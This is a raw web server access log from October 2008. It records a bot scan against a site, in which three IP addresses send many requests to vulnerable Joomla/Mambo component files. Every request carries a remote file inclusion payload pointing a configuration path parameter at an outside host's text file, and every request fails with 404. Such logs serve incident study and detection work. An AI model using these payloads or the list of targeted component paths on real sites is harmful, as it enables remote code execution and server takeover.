213.165.87.57 - - [23/Oct/2008:09:13:48 -0700] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:48 -0700] "GET /logs/access_080530.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080603.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080603.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log//administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080603.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080606.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:49 -0700] "GET /logs/access_080530.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080603.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080606.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080603.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs/access_080530.log//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:50 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log%20%20//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log%20%20//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080603.log%20%20//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080530.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:51 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:51 -0700] "GET /logs/access_080606.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
